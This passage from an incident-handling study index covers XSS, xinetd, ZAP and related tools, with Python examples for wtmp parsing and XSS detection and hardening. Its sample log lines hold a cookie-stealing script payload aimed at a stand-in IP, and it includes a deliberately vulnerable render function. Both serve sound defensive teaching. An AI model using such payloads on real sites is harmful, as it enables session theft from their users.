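if __name__ == "__main__":
    recs = parse_wtmp(SAMPLE_WTMP)
    for s in login_sessions(recs):
        print(f"{s['user']:8} {s['host']:16} {s['line']:6} {s['start']:%Y-%m-%d %H:%M} -> "
              f"{s['end'].strftime('%H:%M') if s['end'] else 'still logged in'}")
    print("outside hours:", [s["user"] for s in logins_outside_hours(login_sessions(recs))])
```

To run it against evidence, read the copied file with open("wtmp", "rb").read() and check len(data) % UTMP_SIZE == 0 first; a non-zero remainder means a truncated file or a different struct layout. Remember that an attacker with root can edit or zero this file, so corroborate with auth logs, btmp, and network records.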
xinetd (Book 2, p. 105) *nix super-server daemon that starts network services on demand; configured via /etc/xinetd.conf and /etc/xinetd.d/
XOR 3 128 reference
Xplico (Book 3, p. 55) An outstanding tool for pulling data out of network traffic and presenting it in a way that is easy to review
XSS (Book 4, p. 106) Cross-Site Scripting enables an attacker to steal information (such as cookies) from users of a vulnerable website. XSS is based on web applications that reflect user input back to a user
XSS (Book 4, pp. 104-109)
Trick the user into clicking a link with scripts embedded
--The script is sent to the web page as part of user input
--When the user is sent to the page, the script is "reflected" back to the user
-The script runs on the client, executing the attacker's plans
XSS - Exploit Admin Apps (Book 4, p. 114)
Many applications have an admin console accessed using a browser that typically logs all kinds of things, such as date and timestamp, user account, transaction type and details, user agent string (browser type), and packet logs
--The script is input and stored in the log
-When the admin reviews the logs, the script runs on the admin's host
XSS (Launching Attacks) (Book 4, p. 107) The attacker's script must be sent to the victim: a URL embedded in an e-mail or newsgroup posting, or a URL provided on a third-party website (either clicked by the victim user or auto-loaded when visiting a malicious website)
XSS (Overview) (Book 4, p. 108) The attacker intends to obtain sensitive data from the victim user. The attacker searches the target site to find a vulnerable CGI, then writes a URL with a specialized browser script. The browser script steals the cookie.
XSS (Reflected) Walkthrough (Book 4, p. 110) View diagram. It's called "reflected" because the script is reflected off the target website back into the user's browser
XSS (Stored) Walkthrough (Book 4, p. 111) View diagram. It's called "stored" because the script is stored on the target website's backend and delivered back to the user's browser
XSS via Other Mechanisms (Book 4, p. 116) How to send scripts? HTTP/HTTPS via web app, e-mail, FTP, U.S. Postal Service, mag stripe, Electronic Data Interchange (EDI)? X.25? SS7?
XSS Walkthrough (XSS works in 5 steps) (Book 4, p. 109)
0) Victim uses a website that sets cookies in the victim's browser
1) Victim clicks a URL or visits a website that includes the malicious script
2) Victim user's browser transmits the malicious code to the vulnerable target site as a web request
3) Target site reflects the malicious code back to the victim user's browser in the response to the request
4) Malicious code executes within the victim user's browser under the security context of the target site

XSS: Access to Internal Systems (Book 4, p. 112)
Using an XSS variant, the attacker could start scanning or otherwise attacking the internal network
-Users' browsers can reflect the code back into the network, using the user's access to scan, exploit, etc.
Jikto: performs a Nikto scan of internal websites using XSS
XSS: Admin Apps (Book 4, p. 114) Web logs that store user input can be used to attack admin systems; see XSS - Exploit Admin Apps

XSS: Attacking Admins (Book 4, p. 115) View diagram. The application gathers input from a user and stores it in the log for the administrator to view. The admin periodically views the stored content; the attacker inserts evil content and attacks the admins.

XSS: BeEF (Book 4, p. 113)
Uses an XSS hook to take interactive control of a victim browser
-Port scanner
-Visited URLs (history grabber)
-Software inventory
-Alter the current web page view in the browser (deface page)
-Deliver a Metasploit exploit to another target

XSS: Client Defenses (Book 4, pp. 118-119)
Preparation:
--Disable scripting or use browser features to selectively control scripts
Identification:
--IDS and/or logs showing user input with embedded scripts. Watch for encoded info (hex, Unicode, etc.)
Containment:
--Add a filter to incoming data
Eradication:
--Remove the attacker's data and transactions
Recovery:
--Contact the antifraud group

XSS: Defenses (Book 4, p. 117)
Filter user input, remove unneeded characters
--You must filter on the server side; your application must filter out quotes, semicolons, and other shell/script metacharacters
--You cannot do this filtering using JavaScript on the client because the attacker can get around such filtering
--Define the characters that are OK (alphanumeric) and filter everything else out: a whitelist approach
ModSecurity for Apache, IIS, and Nginx includes such filtering capabilities
Use IDS and/or logs showing user input with embedded scripts
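Added example for the XSS Walkthrough and XSS: Defenses entries above (not code from the SANS 504 material): step 3 of the walkthrough as the unsafe reflection, the server-side fix built on a whitelist plus output encoding, and the log review the entries recommend. Because the Client Defenses entry warns about encoded input, the review step peels off percent-encoding, HTML entities and \uXXXX escapes (up to three layers) before matching, so double-encoded and entity-wrapped payloads are caught. The search page, the whitelist pattern and the request lines are constructed for this example.

```python
"""Reflected XSS: the unsafe reflection, the server-side fix, and log review.

Added example for the "XSS Walkthrough" and "XSS: Defenses" entries; not
code from the SANS 504 material. The search page, the allowlist and the
sample request lines are constructed.
"""
import html
import re
from typing import List
from urllib.parse import unquote

# Constructed sample of requests as they would appear in a web server log.
SAMPLE_REQUESTS = [
    "GET /search?q=blue+widgets HTTP/1.1",
    "GET /search?q=%3Cscript%3Edocument.location%3D'http://203.0.113.5/c?'%2Bdocument.cookie%3C/script%3E HTTP/1.1",
    "GET /search?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1",  # double percent-encoded
    "GET /search?q=%26%2360%3Bsvg%2Fonload%3Dalert(1)%26%2362%3B HTTP/1.1",          # HTML entities under URL encoding
    "GET /search?q=\\u003cscript\\u003ealert(1)\\u003c/script\\u003e HTTP/1.1",      # JavaScript-style escapes
    "GET /search?q=acme+2024 HTTP/1.1",
]

SCRIPT_RE = re.compile(r"<\s*script|javascript\s*:|<\s*(img|svg|iframe|body)\b|\bon[a-z]+\s*=", re.IGNORECASE)
ALLOWED_RE = re.compile(r"^[A-Za-z0-9 _.\-]{1,64}$")   # assumption: what a search term may contain


def render_search_vulnerable(q: str) -> str:
    """Step 3 of the walkthrough: the input is reflected into the page untouched."""
    return f"<p>Results for: {q}</p>"


def allowlist_ok(q: str) -> bool:
    """Whitelist check: only the characters the field legitimately needs."""
    return ALLOWED_RE.match(q) is not None


def encode_for_html(value: str) -> str:
    """Output encoding for an HTML text context; quotes are encoded too for attribute contexts."""
    return html.escape(value, quote=True)


def render_search_hardened(q: str) -> str:
    """Server-side fix: refuse anything outside the allowlist, and encode on output regardless."""
    if not allowlist_ok(q):
        q = "(invalid search term)"
    return f"<p>Results for: {encode_for_html(q)}</p>"


def normalize(value: str, rounds: int = 3) -> str:
    """Undo the layers an attacker adds to hide markup from naive string matching."""
    for _ in range(rounds):
        decoded = unquote(value)                        # %3C -> <
        decoded = html.unescape(decoded)                # &#60; -> <
        decoded = re.sub(r"\\u([0-9a-fA-F]{4})",        # \u003c -> <
                         lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == value:
            break
        value = decoded
    return value


def looks_like_script_injection(value: str) -> bool:
    return SCRIPT_RE.search(normalize(value)) is not None


def flag_requests(log_lines: List[str]) -> List[str]:
    """Return the raw q= values that carry embedded script once decoded."""
    flagged = []
    for line in log_lines:
        m = re.search(r"\?q=(\S*)", line)
        if m and looks_like_script_injection(m.group(1)):
            flagged.append(m.group(1))
    return flagged


if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"
    print(render_search_vulnerable(payload))
    print(render_search_hardened(payload))
    for q in flag_requests(SAMPLE_REQUESTS):
        print("flagged:", q, "->", normalize(q))
```

The allowlist and the output encoding are independent controls: the first rejects what the field never needs, the second makes whatever does get through inert in the HTML context it lands in. Do both on the server; the browser-side version of either can be stripped by the attacker before the request is sent.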
ZAP (Book 4, p. 82) ZAP: web app vulnerability scanner

ZAP Features (Book 4, p. 140)
ZAP is a feature-rich web app manipulation proxy
-Tracks website hierarchy
-Supports client-side SSL certs
-Supports chained proxies
-Includes a web spider
-Built-in hash/encoding tool
-Find and filter features
-Automated SQL injection and XSS detection mechanisms
-Automatically scans sites passively
-Customizable unsafe content detection
Zenmap Network Map Output (Book 2, p. 85) The Zenmap GUI can provide an interactive graphical portrayal of the network. Output shows topology and cumulative views of recent scans, and supports changing focus, zooming, and a fisheye view
Zero-Day Exploit: Worms (Book 4, p. 60) see Worms: Zero-Day Exploit
